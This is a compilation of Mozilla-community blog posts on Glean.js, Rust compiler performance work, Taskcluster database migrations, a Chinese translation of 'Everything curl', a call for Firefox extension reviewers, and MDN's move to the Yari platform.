In a previous TWiG blog post, I talked about my experiment on trying to compile glean-core to Wasm. The motivation for that experiment was the then upcoming Glean.js workweek, where some of us were going to take a pass at building a proof-of-concept implementation of Glean in Javascript. That blog post ends on the following note:

My conclusion is that although we can compile glean-core to Wasm, it doesn’t mean that we should do that. The advantages of having a single source of truth for the Glean SDK are very enticing, but at the moment it would be more practical to rewrite something specific for the web.

When I wrote that post, we hadn’t gone through the Glean.js workweek and were not sure yet if it would be viable to pursue a new implementation of Glean in Javascript.

I am not going to keep up the suspense though. We were able to implement a proof of concept version of Glean that works in Javascript environments during that workweek, it:

  • Persisted data throughout application runs (e.g. client_id);
  • Allowed for recording event metrics;
  • Sent Glean schema compliant pings to the pipeline.

And all of this, we were able to make work on:

  • Static websites;
  • Svelte apps;
  • Node.js servers;
  • Electron apps;
  • Node.js command like applications;
  • Node.js server applications;
  • Qt/QML apps.

Check out the code for this project on: https://github.com/brizental/gleanjs

The outcome of the workweek confirmed it was possible and worth it to go ahead with Glean.js. For the past weeks the Glean SDK team has officially started working on the roadmap for this project’s MVP.

Our plan is to have an MVP of Glean.js that can be used on webextensions by February/2021.

The reason for our initial focus on webextensions is that the Ion project has volunteered to be Glean.js’ first consumer. Support for static websites and Qt/QML apps will follow. Other consumers such as Node.js servers and CLIs are not part of the initial roadmap.

Although we learned a lot by building the POC, we were probably left with more open questions than answered ones. The Javascript environment is a very special one and when we set out to build something that can work virtually anywhere that runs Javascript, we were embarking on an adventure.

Each Javascript environment has different resources the developer can interact with. Let’s think, for example, about persistence solutions: on web browsers we can use localStorage or IndexedDB, but on Node.js servers / CLIs we would need to go another way completely and use Level DB or some other external library. What is the best way to deal with this and what exactly are the differences between environments?

The issue of having different resources is not even the most challenging one. Glean defines internal metrics and their lifetimes, and internal pings and their schedules. This is important so that our users can do base analysis without having any custom metrics or pings. The hardest open question we were left with was: what pings should Glean.js send out of the box and what should their scheduling look like?

Because Glean.js opens up possibilities for such varied consumers: from websites to CLIs, defining scheduling that will be universal for all of its consumers is probably not even possible. If we decide to tackle these questions for each environment separately, we are still facing tricky consumers and consumers that we are not used to, such as websites and web extensions.

Websites specifically come with many questions: how can we guarantee client side data persistence, if a user can easily delete all of it by running some code in the console or tweaking browser settings. What is the best scheduling for pings, if each website can have so many different usage lifecycles?

We are excited to tackle these and many other challenges in the coming months. Development of the roadmap can be followed on Bug 1670910.

Nicholas NethercoteHow to speed up the Rust compiler in 2020

I last wrote in December 2019 about my work on speeding up the Rust compiler. Time for another update.

Incremental compilation

I started the year by profiling incremental compilation and making several improvements there.

#68914: Incremental compilation pushes a great deal of data through a hash function, called SipHasher128, to determine what code has changed since the last compiler invocation. This PR greatly improved the extraction of bytes from the input byte stream (with a lot of back and forth to ensure it worked on both big-endian and little-endian platforms), giving incremental compilation speed-ups of up to 13% across many benchmarks. It also added a lot more comments to explain what is going on in that code, and removed multiple uses of unsafe.

#69332: This PR reverted the part of #68914 that changed the u8to64_le function in a way that made it simpler but slower. This didn’t have much impact on performance because it’s not a hot function, but I’m glad I caught it in case it gets used more in the future. I also added some explanatory comments so nobody else will make the same mistake I did!

#69050: LEB128 encoding is used extensively within Rust crate metadata. Michael Woerister had previously sped up encoding and decoding in #46919, but there was some fat left. This PR carefully minimized the number of operations in the encoding and decoding loops, almost doubling their speed, and giving wins on many benchmarks of up to 5%. It also removed one use of unsafe. In the PR I wrote a detailed description of the approach I took, covering how I found the potential improvement via profiling, the 18 different things I tried (10 of which improved speed), and the final performance results.

LLVM bitcode

Last year I noticed from profiles that rustc spends some time compressing the LLVM bitcode it produces, especially for debug builds. I tried changing it to not compress the bitcode, and that gave some small speed-ups, but also increased the size of compiled artifacts on disk significantly.

Then Alex Crichton told me something important: the compiler always produces both object code and bitcode for crates. The object code is used when compiling normally, and the bitcode is used when compiling with link-time optimization (LTO), which is rare. A user is only ever doing one or the other, so producing both kinds of code is typically a waste of time and disk space.

In #66598 I tried a simple fix for this: add a new flag to rustc that tells it to omit the LLVM bitcode. Cargo could then use this flag whenever LTO wasn’t being used. After some discussion we decided it was too simplistic, and filed issue #66961 for a more extensive change. That involved getting rid of the use of compressed bitcode by instead storing uncompressed bitcode in a section in the object code (a standard format used by clang), and introducing the flag for Cargo to use to disable the production of bitcode.

The part of rustc that deals with all this was messy. The compiler can produce many different kinds of output: assembly code, object code, LLVM IR, and LLVM bitcode in a couple of possible formats. Some of these outputs are dependent on other outputs, and the choices on what to produce depend on various command line options, as well as details of the particular target platform. The internal state used to track output production relied on many boolean values, and various nonsensical combinations of these boolean values were possible.

When faced with messy code that I need to understand, my standard approach is to start refactoring. I wrote #70289, #70345, and #70384 to clean up code generation, #70297, #70729 , and #71374 to clean up command-line option handling, and #70644 to clean up module configuration. Those changes gave me some familiarity with the code, simplifed it, and I was then able to write #70458 which did the main change.

Meanwhile, Alex Crichton wrote the Cargo support for the new -Cembed-bitcode=no option (and also answered a lot of my questions). Then I fixed rustc-perf so it would use the correct revisions of rustc and Cargo together, without which the the change would erroneously look like a performance regression on CI. Then we went through a full compiler-team approval and final comment period for the new command-line option, and it was ready to land.

Unfortunately, while running the pre-landing tests we discovered that some linkers can’t handle having bitcode in the special section. This problem was only discovered at the last minute because only then are all tests run on all platforms. Oh dear, time for plan B. I ended up writing #71323 which went back to the original, simple approach, with a flag called -Cbitcode-in-rlib=no. [EDIT: note that libstd is still compiled with -Cbitcode-in-rlib=yes, which means that libstd rlibs will still work with both LTO and non-LTO builds.]

The end result was one of the bigger performance improvements I have worked on. For debug builds we saw wins on a wide range of benchmarks of up to 18%, and for opt builds we saw wins of up to 4%. The size of rlibs on disk has also shrunk by roughly 15-20%. Thanks to Alex for all the help he gave me on this!

Anybody who invokes rustc directly instead of using Cargo might want to use -Cbitcode-in-rlib=no to get the improvements.

[EDIT (May 7, 2020): Alex subsequently got the bitcode-in-object-code-section approach working in #71528 by adding the appropriate “ignore this section, linker” incantations to the generated code. He then changed the option name back to the original -Cembed-bitcode=no in #71716. Thanks again, Alex!]

Miscellaneous improvements

#67079: Last year in #64545 I introduced a variant of the shallow_resolved function that was specialized for a hot calling pattern. This PR specialized that function some more, winning up to 2% on a couple of benchmarks.

#67340: This PR shrunk the size of the Nonterminal type from 240 bytes to 40 bytes, reducing the number of memcpy calls (because memcpy is used to copy values larger than 128 bytes), giving wins on a few benchmarks of up to 2%.

#68694: InferCtxt is a type that contained seven different data structures within RefCells. Several hot operations would borrow most or all of the RefCells, one after the other. This PR grouped the seven data structures together under a single RefCell in order to reduce the number of borrows performed, for wins of up to 5%.

#68790: This PR made a couple of small improvements to the merge_from_succ function, giving 1% wins on a couple of benchmarks.

#68848: The compiler’s macro parsing code had a loop that instantiated a large, complex value (of type Parser) on each iteration, but most of those iterations did not modify the value. This PR changed the code so it initializes a single Parser value outside the loop and then uses Cow to avoid cloning it except for the modifying iterations, speeding up the html5ever benchmark by up to 15%. (An aside: I have used Cow several times, and while the concept is straightforward I find the details hard to remember. I have to re-read the documentation each time. Getting the code to work is always fiddly, and I’m never confident I will get it to compile successfully… but once I do it works flawlessly.)

#69256: This PR marked with #[inline] some small hot functions relating to metadata reading and writing, for 1-5% improvements across a number of benchmarks.

#70837: There is a function called find_library_crate that does exactly what its name suggests. It did a lot of repetitive prefix and suffix matching on file names stored as PathBufs. The matching was slow, involving lots of re-parsing of paths within PathBuf methods, because PathBuf isn’t really designed for this kind of thing. This PR pre-emptively extracted the names of the relevant files as strings and stored them alongside the PathBufs, and changed the matching to use those strings instead, giving wins on various benchmarks of up to 3%.

#70876: Cache::predecessors is an oft-called function that produces a vector of vectors, and the inner vectors are usually small. This PR changed the inner vector to a SmallVec for some very small wins of up to 0.5% on various benchmarks.

Other stuff

I added support to rustc-perf for the compiler’s self-profiler. This gives us one more profiling tool to use on the benchmark suite on local machines.

I found that using LLD as the linker when building rustc itself reduced the time taken for linking from about 93 seconds to about 41 seconds. (On my Linux machine I do this by preceding the build command with RUSTFLAGS="-C link-arg=-fuse-ld=lld".) LLD is a really fast linker! #39915 is the three-year old issue open for making LLD the default linker for rustc, but unfortunately it has stalled. Alexis Beingessner wrote a nice summary of the current situation. If anyone with knowledge of linkers wants to work on that issue, it could be a huge win for many Rust users.

Failures

Not everything I tried worked. Here are some notable failures.

#69152: As mentioned above, #68914 greatly improved SipHasher128, the hash function used by incremental compilation. That hash function is a 128-bit version of the default 64-bit hash function used by Rust hash tables. I tried porting those same improvements to the default hasher. The goal was not to improve rustc’s speed, because it uses FxHasher instead of default hashing, but to improve the speed of all Rust programs that do use default hashing. Unfortunately, this caused some compile-time regressions for complex reasons discussed in detail in the PR, and so I abandoned it. I did manage to remove some dead code in the default hasher in #69471, though.

#69153: While working on #69152, I tried switching from FxHasher back to the improved default hasher (i.e. the one that ended up not landing) for all hash tables within rustc. The results were terrible; every single benchmark regressed! The smallest regression was 4%, the largest was 85%. This demonstrates (a) how heavily rustc uses hash tables, and (b) how much faster FxHasher is than the default hasher when working with small keys.

I tried using ahash for all hash tables within rustc. It is advertised as being as fast as FxHasher but higher quality. I found it made rustc a tiny bit slower. Also, ahash is also not deterministic across different builds, because it uses const_random! when initializing hasher state. This could cause extra noise in perf runs, which would be bad. (Edit: It would also prevent reproducible builds, which would also be bad.)

I tried changing the SipHasher128 function used for incremental compilation from the Sip24 algorithm to the faster but lower-quality Sip13 algorithm. I got wins of up to 3%, but wasn’t confident about the safety of the change and so didn’t pursue it further.

#69157: Some follow-up measurements after #69050 suggested that its changes to LEB128 decoding were not as clear a win as they first appeared. (The improvements to encoding were still definitive.) The performance of decoding appears to be sensitive to non-local changes, perhaps due to differences in how the decoding functions are inlined throughout the compiler. This PR reverted some of the changes from #69050 because my initial follow-up measurements suggested they might have been pessimizations. But then several sets of additional follow-up measurements taken after rebasing multiple times suggested that the reversions sometimes regressed performance. The reversions also made the code uglier, so I abandoned this PR.

#66405: Each obligation held by ObligationForest can be in one of several states, and transitions between those states occur at various points. This PR reduced the number of states from five to three, and greatly reduced the number of state transitions, which won up to 4% on a few benchmarks. However, it ended up causing some drastic regressions for some users, so in #67471 I reverted those changes.

#60608: This issue suggests using FxIndexSet in some places where currently an FxHashMap plus a Vec are used. I tried it for the symbol table and it was a significant regression for a few benchmarks.

Progress

Since my last blog post, compile times have seen some more good improvements. The following screenshot shows wall-time changes on the benchmark suite since then (2019-12-08 to 2020-04-22).

Table of compiler performance results.

The biggest changes are in the synthetic stress tests await-call-tree-debug, wf-projection-stress-65510, and ctfe-stress-4, which aren’t representative of typical code and aren’t that important.

Overall it’s good news, with many improvements (green), some in the double digits, and relatively few regressions (red). Many thanks to everybody who helped with all the performance improvements that landed during this period.

Dustin J. MitchellTaskcluster's DB (Part 2) - DB Migrations

This is part 2 of a deep-dive into the implementation details of Taskcluster’s backend data stores. Check out part 1 for the background, as we’ll jump right in here!

Azure in Postgres

As of the end of April, we had all of our data in a Postgres database, but the data was pretty ugly. For example, here’s a record of a worker as recorded by worker-manager:

partition_key | testing!2Fstatic-workers
row_key       | cc!2Fdd~ee!2Fff
value         | {
    "state": "requested",
    "RowKey": "cc!2Fdd~ee!2Fff",
    "created": "2015-12-17T03:24:00.000Z",
    "expires": "3020-12-17T03:24:00.000Z",
    "capacity": 2,
    "workerId": "ee/ff",
    "providerId": "updated",
    "lastChecked": "2017-12-17T03:24:00.000Z",
    "workerGroup": "cc/dd",
    "PartitionKey": "testing!2Fstatic-workers",
    "lastModified": "2016-12-17T03:24:00.000Z",
    "workerPoolId": "testing/static-workers",
    "__buf0_providerData": "eyJzdGF0aWMiOiJ0ZXN0ZGF0YSJ9Cg==",
    "__bufchunks_providerData": 1
  }
version       | 1
etag          | 0f6e355c-0e7c-4fe5-85e3-e145ac4a4c6c

To reap the goodness of a relational database, that would be a “normal”[*] table: distinct columns, nice data types, and a lot less redundancy.

All access to this data is via some Azure-shaped stored functions, which are also not amenable to the kinds of flexible data access we need:

  • <tableName>_load - load a single row
  • <tableName>_create - create a new row
  • <tableName>_remove - remove a row
  • <tableName>_modify - modify a row
  • <tableName>_scan - return some or all rows in the table

[*] In the normal sense of the word – we did not attempt to apply database normalization.

Database Migrations

So the next step, which we dubbed “phase 2”, was to migrate this schema to one more appropriate to the structure of the data.

The typical approach is to use database migrations for this kind of work, and there are lots of tools for the purpose. For example, Alembic and Django both provide robust support for database migrations – but they are both in Python.

The only mature JS tool is knex, and after some analysis we determined that it both lacked features we needed and brought a lot of additional features that would complicate our usage. It is primarily a “query builder”, with basic support for migrations. Because we target Postgres directly, and because of how we use stored functions, a query builder is not useful. And the migration support in knex, while effective, does not support the more sophisticated approaches to avoiding downtime outlined below.

We elected to roll our own tool, allowing us to get exactly the behavior we wanted.

Migration Scripts

Taskcluster defines a sequence of numbered database versions. Each version corresponds to a specific database schema, which includes the structure of the database tables as well as stored functions. The YAML file for each version specifies a script to upgrade from the previous version, and a script to downgrade back to that version. For example, an upgrade script might add a new column to a table, with the corresponding downgrade dropping that column.

version: 29
migrationScript: |-
  begin
    alter table secrets add column last_used timestamptz;
  end
downgradeScript: |-
  begin
    alter table secrets drop column last_used;
  end

So far, this is a pretty normal approach to migrations. However, a major drawback is that it requires careful coordination around the timing of the migration and deployment of the corresponding code. Continuing the example of adding a new column, if the migration is deployed first, then the existing code may execute INSERT queries that omit the new column. If the new code is deployed first, then it will attempt to read a column that does not yet exist.

There are workarounds for these issues. In this example, adding a default value for the new column in the migration, or writing the queries such that they are robust to a missing column. Such queries are typically spread around the codebase, though, and it can be difficult to ensure (by testing, of course) that they all operate correctly.

In practice, most uses of database migrations are continuously-deployed applications – a single website or application server, where the developers of the application control the timing of deployments. That allows a great deal of control, and changes can be spread out over several migrations that occur in rapid succession.

Taskcluster is not continuously deployed – it is released in distinct versions which users can deploy on their own cadence. So we need a way to run migrations when upgrading to a new Taskcluster release, without breaking running services.

Stored Functions

Part 1 mentioned that all access to data is via stored functions. This is the critical point of abstraction that allows smooth migrations, because stored functions can be changed at runtime.

Each database version specifies definitions for stored functions, either introducing new functions or replacing the implementation of existing functions. So the version: 29 YAML above might continue with

methods:
  create_secret:
    args: name text, value jsonb
    returns: ''
    body: |-
      begin
        insert
        into secrets (name, value, last_used)
        values (name, value, now());
      end
  get_secret:
    args: name text
    returns: record
    body: |-
      begin
        update secrets
        set last_used = now()
        where secrets.name = get_secret.name;

        return query
        select name, value from secrets
        where secrets.name = get_secret.name;
      end

This redefines two existing functions to operate properly against the new table. The functions are redefined in the same database transaction as the migrationScript above, meaning that any calls to create_secret or get_secret will immediately begin populating the new column. A critical rule (enforced in code) is that the arguments and return type of a function cannot be changed.

To support new code that references the last_used value, we add a new function:

  get_secret_with_last_used:
    args: name text
    returns: record
    body: |-
      begin
        update secrets
        set last_used = now()
        where secrets.name = get_secret.name;

        return query
        select name, value, last_used from secrets
        where secrets.name = get_secret.name;
      end

Another critical rule is that DB migrations must be applied fully before the corresponding version of the JS code is deployed. In this case, that means code that uses get_secret_with_last_used is deployed only after the function is defined.

All of this can be thoroughly tested in isolation from the rest of the Taskcluster code, both unit tests for the functions and integration tests for the upgrade and downgrade scripts. Unit tests for redefined functions should continue to pass, unchanged, providing an easy-to-verify compatibility check.

Phase 2 Migrations

The migrations from Azure-style tables to normal tables are, as you might guess, a lot more complex than this simple example. Among the issues we faced:

We split the work of performing these migrations across the members of the Taskcluster team, supporting each other through the tricky bits, in a rather long but ultimately successful “Postgres Phase 2” sprint.

0042 - secrets phase 2

Let’s look at one of the simpler examples: the secrets service. The migration script creates a new secrets table from the data in the secrets_entities table, using Postgres’s JSON function to unpack the value column into “normal” columns.

The database version YAML file carefully redefines the Azure-compatible DB functions to access the new secrets table. This involves unpacking function arguments from their JSON formats, re-packing JSON blobs for return values, and even some light parsing of the condition string for the secrets_entities_scan function.

It then defines new stored functions for direct access to the normal table. These functions are typically similar, and more specific to the needs of the service. For example, the secrets service only modifies secrets in an “upsert” operation that replaces any existing secret of the same name.

Step By Step

To achieve an extra layer of confidence in our work, we landed all of the phase-2 PRs in two steps. The first step included migration and downgrade scripts and the redefined stored functions, as well as tests for those. But critically, this step did not modify the service using the table (the secrets service in this case). So the unit tests for that service use the redefined stored functions, acting as a kind of integration-test for their implementations. This also validates that the service will continue to run in production between the time the database migration is run and the time the new code is deployed. We landed this step on GitHub in such a way that reviewers could see a green check-mark on the step-1 commit.

In the second step, we added the new, purpose-specific stored functions and rewrote the service to use them. In services like secrets, this was a simple change, but some other services saw more substantial rewrites due to more complex requirements.

Deprecation

Naturally, we can’t continue to support old functions indefinitely: eventually they would be prohibitively complex or simply impossible to implement. Another deployment rule provides a critical escape from this trap: Taskcluster must be upgraded at most one major version at a time (e.g., 36.x to 37.x). That provides a limited window of development time during which we must maintain compatibility.

Defining that window is surprisingly tricky, but essentially it’s two major revisions. Like the software engineers we are, we packaged up that tricky computation in a script, and include the lifetimes in some generated documentation

What’s Next?

This post has hinted at some of the complexity of “phase 2”. There are lots of details omitted, of course!

But there’s one major detail that got us in a bit of trouble. In fact, we were forced to roll back during a planned migration – not an engineer’s happiest moment. The queue_tasks_entities and queue_artifacts_entities table were just too large to migrate in any reasonable amount of time. Part 3 will describe what happened, how we fixed the issue, and what we’re doing to avoid having the same issue again.

Daniel StenbergEverything curl in Chinese

The other day we celebrated everything curl turning 5 years old, and not too long after that I got myself this printed copy of the Chinese translation in my hands!

This version of the book is available for sale on Amazon and the translation was done by the publisher.

The book’s full contents are available on github and you can read the English version online on ec.haxx.se.

If you would be interested in starting a translation of the book into another language, let me know and I’ll help you get started. Currently the English version consists of 72,798 words so it’s by no means an easy feat to translate! My other two other smaller books, http2 explained and HTTP/3 explained have been translated into twelve(!) and ten languages this way (and there might be more languages coming!).

<figcaption>A collection of printed works authored by yours truly!</figcaption>
<figcaption>Inside the Chinese version – yes I can understand some headlines!</figcaption>

Unfortunately I don’t read Chinese so I can’t tell you how good the translation is!

Mozilla Addons BlogContribute to selecting new Recommended extensions

Recommended extensions—a curated list of extensions that meet Mozilla’s highest standards of security, functionality, and user experience—are in part selected with input from a rotating editorial board of community contributors. Each board runs for six consecutive months and evaluates a small batch of new Recommended candidates each month. The board’s evaluation plays a critical role in helping identify new potential Recommended additions.

We are now accepting applications for community board members through 18 November. If you would like to nominate yourself for consideration on the board, please email us at amo-featured [at] mozilla [dot] org and provide a brief explanation why you feel you’d make a keen evaluator of Firefox extensions. We’d love to hear about how you use extensions and what you find so remarkable about browser customization. You don’t have to be an extension developer to effectively evaluate Recommended candidates (though indeed many past board members have been developers themselves), however you should have a strong familiarity with extensions and be comfortable assessing the strengths and flaws of their functionality and user experience.

Selected contributors will participate in a six-month project that runs from December – May.

Here’s the entire collection of Recommended extensions, if curious to explore what’s currently curated.

Thank you and we look forward to hearing from interested contributors by the 18 November application deadline!

The post Contribute to selecting new Recommended extensions appeared first on Mozilla Add-ons Blog.

Hacks.Mozilla.OrgMDN Web Docs evolves! Lowdown on the upcoming new platform

Update, November 3: The Yari beta phase is now open, so we’ve removed the beta signup form from this post. If you want to participate in beta testing, you can find the details on our Yari beta launch explainer.

The time has come for Kuma — the platform that powers MDN Web Docs — to evolve. For quite some time now, the MDN developer team has been planning a radical platform change, and we are ready to start sharing the details of it. The question on your lips might be “What does a Kuma evolve into? A KumaMaMa?”

What? Kuma is evolving!

For those of you not so into Pokémon, the question might instead be “How exactly is MDN changing, and how does it affect MDN users and contributors”?

For general users, the answer is easy — there will be very little change to how we serve the great content you use everyday to learn and do your jobs.

For contributors, the answer is a bit more complex.

The changes in a nutshell

In short, we are updating the platform to move the content from a MySQL database to being hosted in a GitHub repository (codename: Project Yari).

Congratulations! Your Kuma evolved into Yari

The main advantages of this approach are:

  • Less developer maintenance burden: The existing (Kuma) platform is complex and hard to maintain. Adding new features is very difficult. The update will vastly simplify the platform code — we estimate that we can remove a significant chunk of the existing codebase, meaning easier maintenance and contributions.
  • Better contribution workflow: We will be using GitHub’s contribution tools and features, essentially moving MDN from a Wiki model to a pull request (PR) model. This is so much better for contribution, allowing for intelligent linting, mass edits, and inclusion of MDN docs in whatever workflows you want to add it to (you can edit MDN source files directly in your favorite code editor).
  • Better community building: At the moment, MDN content edits are published instantly, and then reverted if they are not suitable. This is really bad for community relations. With a PR model, we can review edits and provide feedback, actually having conversations with contributors, building relationships with them, and helping them learn.
  • Improved front-end architecture: The existing MDN platform has a number of front-end inconsistencies and accessibility issues, which we’ve wanted to tackle for some time. The move to a new, simplified platform gives us a perfect opportunity to fix such issues.

The exact form of the platform is yet to be finalized, and we want to involve you, the community, in helping to provide ideas and test the new contribution workflow! We will have a beta version of the new platform ready for testing on November 2, and the first release will happen on December 14.

Simplified back-end platform

We are replacing the current MDN Wiki platform with a JAMStack approach, which publishes the content managed in a GitHub repo. This has a number of advantages over the existing Wiki platform, and is something we’ve been considering for a number of years.

Before we discuss our new approach, let’s review the Wiki model so we can better understand the changes we’re making.

Current MDN Wiki platform

 

workflow diagram of the old kuma platform

It’s important to note that both content contributors (writers) and content viewers (readers) are served via the same architecture. That architecture has to accommodate both use cases, even though more than 99% of our traffic comprises document page requests from readers. Currently, when a document page is requested, the latest version of the document is read from our MySQL database, rendered into its final HTML form, and returned to the user via the CDN.

That document page is stored and served from the CDN’s cache for the next 5 minutes, so subsequent requests — as long as they’re within that 5-minute window — will be served directly by the CDN. That caching period of 5 minutes is kept deliberately short, mainly due to the fact that we need to accommodate the needs of the writers. If we only had to accommodate the needs of the readers, we could significantly increase the caching period and serve our document pages more quickly, while at the same time reducing the workload on our backend servers.

You’ll also notice that because MDN is a Wiki platform, we’re responsible for managing all of the content, and tasks like storing document revisions, displaying the revision history of a document, displaying differences between revisions, and so on. Currently, the MDN development team maintains a large chunk of code devoted to just these kinds of tasks.

New MDN platform

 

workflow diagram of the new yari platform

With the new JAMStack approach, the writers are served separately from the readers. The writers manage the document content via a GitHub repository and pull request model, while the readers are served document pages more quickly and efficiently via pre-rendered document pages served from S3 via a CDN (which will have a much longer caching period). The document content from our GitHub repository will be rendered and deployed to S3 on a daily basis.

You’ll notice, from the diagram above, that even with this new approach, we still have a Kubernetes cluster with Django-based services relying on a relational database. The important thing to remember is that this part of the system is no longer involved with the document content. Its scope has been dramatically reduced, and it now exists solely to provide APIs related to user accounts (e.g. login) and search.

This separation of concerns has multiple benefits, the most important three of which are as follows:

  • First, the document pages are served to readers in the simplest, quickest, and most efficient way possible. That’s really important, because 99% of MDN’s traffic is for readers, and worldwide performance is fundamental to the user experience.
  • Second, because we’re using GitHub to manage our document content, we can take advantage of the world-class functionality that GitHub has to offer as a content management system, and we no longer have to support the large body of code related to our current Wiki platform. It can simply be deleted.
  • Third, and maybe less obvious, is that this new approach brings more power to the platform. We can, for example, perform automated linting and testing on each content pull request, which allows us to better control quality and security.

New contribution workflow

Because MDN content is soon to be contained in a GitHub repo, the contribution workflow will change significantly. You will no longer be able to click Edit on a page, make and save a change, and have it show up nearly immediately on the page. You’ll also no longer be able to do your edits in a WYSIWYG editor.

Instead, you’ll need to use git/GitHub tooling to make changes, submit pull requests, then wait for changes to be merged, the new build to be deployed, etc. For very simple changes such as fixing typos or adding new paragraphs, this may seem like a step back — Kuma is certainly convenient for such edits, and for non-developer contributors.

However, making a simple change is arguably no more complex with Yari. You can use the GitHub UI’s edit feature to directly edit a source file and then submit a PR, meaning that you don’t have to be a git genius to contribute simple fixes.

For more complex changes, you’ll need to use the git CLI tool, or a GUI tool like GitHub Desktop, but then again git is such a ubiquitous tool in the web industry that it is safe to say that if you are interested in editing MDN, you will probably need to know git to some degree for your career or course. You could use this as a good opportunity to learn git if you don’t know it already! On top of that there is a file system structure to learn, and some new tools/commands to get used to, but nothing terribly complex.

Another possible challenge to mention is that you won’t have a WYSIWYG to instantly see what the page looks like as you add your content, and in addition you’ll be editing raw HTML, at least initially (we are talking about converting the content to markdown eventually, but that is a bit of a ways off). Again, this sounds like a step backwards, but we are providing a tool inside the repo so that you can locally build and preview the finished page to make sure it looks right before you submit your pull request.

Looking at the advantages now, consider that making MDN content available as a GitHub repo is a very powerful thing. We no longer have spam content live on the site, with us then having to revert the changes after the fact. You are also free to edit MDN content in whatever way suits you best — your favorite IDE or code editor — and you can add MDN documentation into your preferred toolchain (and write your own tools to edit your MDN editing experience). A lot of engineers have told us in the past that they’d be much happier to contribute to MDN documentation if they were able to submit pull requests, and not have to use a WYSIWYG!

We are also looking into a powerful toolset that will allow us to enhance the reviewing process, for example as part of a CI process — automatically detecting and closing spam PRs, and as mentioned earlier on, linting pages once they’ve been edited, and delivering feedback to editors.

Having MDN in a GitHub repo also offers much easier mass edits; blanket content changes have previously been very difficult.

Finally, the “time to live” should be acceptable — we are aiming to have a quick turnaround on the reviews, and the deployment process will be repeated every 24 hours. We think that your changes should be live on the site in 48 hours as a worst case scenario.

Better community building

Currently MDN is not a very lively place in terms of its community. We have a fairly active learning forum where people ask beginner coding questions and seek help with assessments, but there is not really an active place where MDN staff and volunteers get together regularly to discuss documentation needs and contributions.

Part of this is down to our contribution model. When you edit an MDN page, either your contribution is accepted and you don’t hear anything, or your contribution is reverted and you … don’t hear anything. You’ll only know either way by looking to see if your edit sticks, is counter-edited, or is reverted.

This doesn’t strike us as very friendly, and I think you’ll probably agree. When we move to a git PR model, the MDN community will be able to provide hands-on assistance in helping people to get their contributions right — offering assistance as we review their PRs (and offering automated help too, as mentioned previously) — and also thanking people for their help.

It’ll also be much easier for contributors to show how many contributions they’ve made, and we’ll be adding in-page links to allow people to file an issue on a specific page or even go straight to the source on GitHub and fix it themselves, if a problem is encountered.

In terms of finding a good place to chat about MDN content, you can join the discussion on the MDN Web Docs chat room on Matrix.

Improved front-end architecture

The old Kuma architecture has a number of front-end issues. Historically we have lacked a well-defined system that clearly describes the constraints we need to work within, and what our site features look like, and this has led to us ending up with a bloated, difficult to maintain front-end code base. Working on our current HTML and CSS is like being on a roller coaster with no guard-rails.

To be clear, this is not the fault of any one person, or any specific period in the life of the MDN project. There are many little things that have been left to fester, multiply, and rot over time.

Among the most significant problems are:

  • Accessibility: There are a number of accessibility problems with the existing architecture that really should be sorted out, but were difficult to get a handle on because of Kuma’s complexity.
  • Component inconsistency: Kuma doesn’t use a proper design system — similar items are implemented in different ways across the site, so implementing features is more difficult than it needs to be.

When we started to move forward with the back-end platform rewrite, it felt like the perfect time to again propose the idea of a design system. After many conversations leading to an acceptable compromise being reached, our design system — MDN Fiori — was born.

Front-end developer Schalk Neethling and UX designer Mustafa Al-Qinneh took a whirlwind tour through the core of MDN’s reference docs to identify components and document all the inconsistencies we are dealing with. As part of this work, we also looked for areas where we can improve the user experience, and introduce consistency through making small changes to some core underlying aspects of the overall design.

This included a defined color palette, simple, clean typography based on a well-defined type scale, consistent spacing, improved support for mobile and tablet devices, and many other small tweaks. This was never meant to be a redesign of MDN, so we had to be careful not to change too much. Instead, we played to our existing strengths and made rogue styles and markup consistent with the overall project.

Besides the visual consistency and general user experience aspects, our underlying codebase needed some serious love and attention — we decided on a complete rethink. Early on in the process it became clear that we needed a base library that was small, nimble, and minimal. Something uniquely MDN, but that could be reused wherever the core aspects of the MDN brand was needed. For this purpose we created MDN-Minimalist, a small set of core atoms that power the base styling of MDN, in a progressively enhanced manner, taking advantage of the beautiful new layout systems we have access to on the web today.

Each component that is built into Yari is styled with MDN-Minimalist, and also has its own style sheet that lives right alongside to apply further styles only when needed. This is an evolving process as we constantly rethink how to provide a great user experience while staying as close to the web platform as possible. The reason for this is two fold:

  • First, it means less code. It means less reinventing of the wheel. It means a faster, leaner, less bandwidth-hungry MDN for our end users.
  • Second, it helps address some of the accessibility issues we have begrudgingly been living with for some time, which are simply not acceptable on a modern web site. One of Mozilla’s accessibility experts, Marco Zehe, has given us a lot of input to help overcome these. We won’t fix everything in our first iteration, but our pledge to all of our users is that we will keep improving and we welcome your feedback on areas where we can improve further.

A wise person once said that the best way to ensure something is done right is to make doing the right thing the easy thing to do. As such, along with all of the work already mentioned, we are documenting our front-end codebase, design system, and pattern library in Storybook (see Storybook files inside the yari repo) with companion design work in Figma (see typography example) to ensure there is an easy, public reference for anyone who wishes to contribute to MDN from a code or design perspective. This in itself is a large project that will evolve over time. More communication about its evolution will follow.

The future of MDN localization

One important part of MDN’s content that we have talked about a lot during the planning phase is the localized content. As you probably already know, MDN offers facilities for translating the original English content and making the localizations available alongside it.

This is good in principle, but the current system has many flaws. When an English page is moved, the localizations all have to be moved separately, so pages and their localizations quite often go out of sync and get in a mess. And a bigger problem is that there is no easy way of signalling that the English version has changed to all the localizers.

General management is probably the most significant problem. You often get a wave of enthusiasm for a locale, and lots of translations done. But then after a number of months interest wanes, and no-one is left to keep the translations up to date. The localized content becomes outdated, which is often harmful to learning, becomes a maintenance time-suck, and as a result, is often considered worse than having no localizations at all.

Note that we are not saying this is true of all locales on MDN, and we are not trying to downplay the amount of work volunteers have put into creating localized content. For that, we are eternally grateful. But the fact remains that we can’t carry on like this.

We did a bunch of research, and talked to a lot of non-native-English speaking web developers about what would be useful to them. Two interesting conclusions were made:

  1. We stand to experience a significant but manageable loss of users if we remove or reduce our localization support. 8 languages cover 90% of the accept-language headers received from MDN users (en, zh, es, ja, fr, ru, pt, de), while 14 languages cover 95% of the accept-languages (en, zh, es, ja, fr, ru, pt, de, ko, zh-TW, pl, it, nl, tr). We predict that we would expect to lose at most 19% of our traffic if we dropped L10n entirely.
  2. Machine translations are an acceptable solution in most cases, if not a perfect one. We looked at the quality of translations provided by automated solutions such as Google Translate and got some community members to compare these translations to manual translations. The machine translations were imperfect, and sometimes hard to understand, but many people commented that a non-perfect language that is up-to-date is better than a perfect language that is out-of-date. We appreciate that some languages (such as CJK languages) fare less well than others with automated translations.

